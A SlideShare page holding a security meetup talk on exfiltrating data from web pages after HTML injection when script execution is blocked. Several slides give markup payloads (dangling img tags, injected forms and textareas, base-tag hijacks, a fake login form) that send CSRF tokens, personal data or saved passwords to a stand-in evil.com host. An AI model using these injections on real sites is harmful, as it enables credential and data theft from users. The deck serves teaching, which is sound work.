SlideShare uma empresa Scribd logo

Postcards from the post xss world- content exfiltration null

Transferir como PPTX, PDF
Piyush Pattanayak
Piyush Pattanayak

Postcards from the post-XSS world- Content Exfiltration technique.

Tecnologia
1 de 20
Postcards from the post-XSS world- Content Exfiltration technique. By : Piyush Pattanayak Null Chennai Meet
Introduction to XSS • Type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. • Occur when an attacker uses a web application to send malicious code generally in the form of a client side script, to a different end user. • Flaws that allow these attacks to succeed are prevalent in most web application that utilize user input and generate output without adequate validation or encoding of user input. • An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to determining that the script should not be trusted, and will execute the script. • Thus giving the malicious script access to cookies, and other sensitive information retained by the browser for use by the site. These scripts can also rewrite the HTML content. Null Chennai Meet
How to test for XSS • XSS should be tested in anything that accepts user input and displays it in the webpage, after rendering it. XSS attacks are successful because most programmers do not apply HTML encoding to the user input, trusting the user input as received. • E.g.: If a user enters “<script>alert (document. Cookie)</script>” in a text filed which upon submission may be rendered as a script tag thus producing a popup alert message with the cookies. • There are plenty of other XSS vectors and information about XSS which you can find out at OWASP. Null Chennai Meet
Introduction to Post XSS • What ? – Very Similar to the XSS. • Why POST XSS? – Browser-level efforts to improve the security of web applications focuses on the containment of attacker-originating scripts. – Content Security Policy, removes the ability to inline JavaScript code in a protected HTML document. – Whitelisting of permissible sources for any externally-loaded scripts. – Related approaches, such as the No Script add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note. Null Chennai Meet
Content Exfiltration • Goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application. • Historically, XSS exploits sought to obtain HTTP (session) cookies. • The introduction of httponly cookies greatly limited this possibility. • In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following: – Personal Data – Tokens used to defend against cross-site request forgery attacks. – Capability-bearing URLs Null Chennai Meet
Several Exfiltration Strategies • Dangling markup injection • <textarea>-based consumption • Rerouting of existing forms • Use of <base> to hijack relative URLs • Form injection to intercept browser-managed passwords • The limits of exfiltration defenses Null Chennai Meet
1. Dangling markup injection • Injection of non-terminated markup which will consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered. • Opposite quote. • Scenario : If we are allowed to inject anything in the HTML content above the sensitive data which we need to steal. • Example : – <img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ' ← Normally-occurring apostrophe in page text ... </div> http://nullcon.net/
Dangling markup injection cont.. • Limitation : Injection point to appear before the sensitive data to be extracted • If governed by pure chance, this condition will be met in 50% of all cases. • Demo : Dangling Markup Injection http://null.co.in/ http://nullcon.net/
2. <textarea>-based consumption • Previous method had some limitation like matching quote character. • Injection of a text area. • Scenario: If there is combination of single and quote present before the sensitive data which we want to steal. • Can be injected before or after the legitimate form tag. • Example : – <form action='http://evil.com/log.cgi'><textarea> ← Injected line ... <input type="hidden" name="xsrf_token" value=‘12345’> ... (EOF) http://null.co.in/ http://nullcon.net/
<textarea>-based consumption cont.. • Limitation : In contrast to the previous method, a degree of user interaction is needed to exfiltrate the data. • Victim has to submit the form by some means. • Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers. • Demo : <textarea>-based consumption http://null.co.in/ http://nullcon.net/
3. Rerouting of existing forms • This works because <form> tag cannot be nested. • Scenario : If we can inject any thing on top of a existing form tag. • This allows the attacker to change the action URL to which any existing form will be submitted. • Example : – <form action='http://evil.com/log.cgi'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form> http://null.co.in/ http://nullcon.net/
Rerouting of existing forms cont.. • Interesting when used to target forms automatically populated with user-specific secrets.  • Demo : Rerouting of existing forms http://null.co.in/ http://nullcon.net/
4. <base> to hijack relative URLs • Injection of <base> tags. • Able to change the semantics of all subsequently appearing relative URLs. • Scenario: If we are allowed to insert on the top of the form element. • Example : – <base href='http://evil.com/'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form <form action=''http://evil.com/update_profile.php'> ... <input type="text" name="real_name" value="John Q. Public"> ... </form> http://null.co.in/ http://nullcon.net/
<base> to hijack relative URLs cont.. • Demo : <base> to hijack relative URLs http://null.co.in/ http://nullcon.net/
5. Form injection to intercept browser-managed passwords • Browsers have features to remember username and password for websites. • Browsers auto fill the fields after matching the domain, id and name parameters of the fields. • We can inject a form into a domain using previous exfiltration techniques, to steal the user credentials. • Example : – <form action="http://www.evil.com" method="POST"> <input type="text" id="username" name="username"> <input type="password" id="password" name="password"> </form> http://null.co.in/ http://nullcon.net/
Form injection to intercept browser-managed passwords cont.. • We can specify GET instead of POST and submit the credentials to a selected same-site destination. • That destination may links to third-party sites (thus leaking the credentials in the Referer header). • Or echo the parameter in the page. http://null.co.in/ http://nullcon.net/
6. Addendum: The limits of exfiltration defenses • All our previous vector redirects to the attacker domain. • If the developer wishes to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain. • However, any attempts to prevent exfiltration, even in script-less environments, are unlikely to be successful. • Exfiltration attempts do not have to be geared toward relaying the data to a third-party website. • Moving data from private place to public place all within the scope of a single website is also sufficient. http://null.co.in/ http://nullcon.net/
Addendum: The limits of exfiltration defenses cont.. • Example : – <form action='/post_review.php'> <input type='hidden' name='review_body' value=" ← Injected lines ... Your current shipping address: ← Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ← Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for /update_address.php and /post_review.php ... </form> • Demo : Addendum: The limits of exfiltration defenses http://null.co.in/ http://nullcon.net/
Reference • http://lcamtuf.coredump.cx/postxss/ http://null.co.in/ http://nullcon.net/
Thank You Q&A http://null.co.in/ http://nullcon.net/

Recomendados

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFjohnwilander
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)ClubHack
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 

Recomendados

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFjohnwilander
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)ClubHack
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hackingBlueinfy Solutions
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hoursnoopythesecuritydog
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developersn|u - The Open Security Community
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)Sam Bowne
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)Sam Bowne
 
DEfcon15 XXE XXS
DEfcon15 XXE XXSDEfcon15 XXE XXS
DEfcon15 XXE XXSpentest pentest
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injectionTal Be'ery
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non jsTal Be'ery
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsSam Bowne
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Elegant Rest Design Webinar
Elegant Rest Design WebinarElegant Rest Design Webinar
Elegant Rest Design WebinarStormpath
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018Marius Vorster
 
Post XSS
Post XSSPost XSS
Post XSSinstaqube
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 

Mais conteúdo relacionado

Mais procurados

Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hoursnoopythesecuritydog
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)Sam Bowne
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)Sam Bowne
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injectionTal Be'ery
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non jsTal Be'ery
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsSam Bowne
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Elegant Rest Design Webinar
Elegant Rest Design WebinarElegant Rest Design Webinar
Elegant Rest Design WebinarStormpath
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018Marius Vorster
 

Mais procurados (20)

Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
 
Front end-security
Front end-securityFront end-security
Front end-security
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
 
DEfcon15 XXE XXS
DEfcon15 XXE XXSDEfcon15 XXE XXS
DEfcon15 XXE XXS
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injection
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non js
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side Controls
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Elegant Rest Design Webinar
Elegant Rest Design WebinarElegant Rest Design Webinar
Elegant Rest Design Webinar
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
 

Semelhante a Postcards from the post xss world- content exfiltration null

Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4Aditya Kamat
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresRoel Palmaers
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSSam Bowne
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 

Semelhante a Postcards from the post xss world- content exfiltration null (20)

Post XSS
Post XSSPost XSS
Post XSS
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Open source security
Open source securityOpen source security
Open source security
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 

Último

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 

Último (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
